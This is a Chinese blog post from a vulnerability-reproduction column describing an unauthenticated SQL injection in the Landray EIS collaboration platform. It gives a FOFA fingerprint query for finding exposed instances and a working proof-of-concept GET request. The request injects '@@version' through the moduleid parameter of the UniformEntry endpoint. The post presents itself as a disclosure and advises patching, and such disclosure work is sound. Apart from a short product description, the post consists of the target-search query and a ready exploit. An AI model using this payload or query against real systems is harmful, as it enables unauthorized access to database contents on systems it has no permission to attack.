蓝凌EIS智慧协同平台 SQL注入漏洞复现

最新推荐文章于 2024-09-13 19:41:32 发布

0xSecl

最新推荐文章于 2024-09-13 19:41:32 发布

阅读量926

点赞数 11

分类专栏：漏洞复现文章标签：安全 web安全 sql

本文链接：https://blog.csdn.net/qq_41904294/article/details/135021350

版权

漏洞复现专栏收录该内容

871 篇文章 1432 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了蓝凌EIS智慧协同平台存在的SQL注入漏洞，详细阐述了漏洞概述、复现环境和复现过程。通过UniformEntry.asp接口的用户输入未被正确过滤，攻击者可执行SQL命令获取敏感信息。建议用户联系厂商安装最新补丁以修复此问题。

摘要由CSDN通过智能技术生成

0x01 产品简介

蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能，旨在提升企业内部沟通、协作和信息共享的效率。

0x02 漏洞概述

由于蓝凌EIS智慧协同平台 UniformEntry.asp接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞，未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。

0x03 复现环境

FOFA：app="Landray-EIS智慧协同平台"

0x04 漏洞复现

PoC

GET /third/DingTalk/Pages/UniformEntry.aspx?moduleid=1%20and%201=@@version--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

查询数据库版本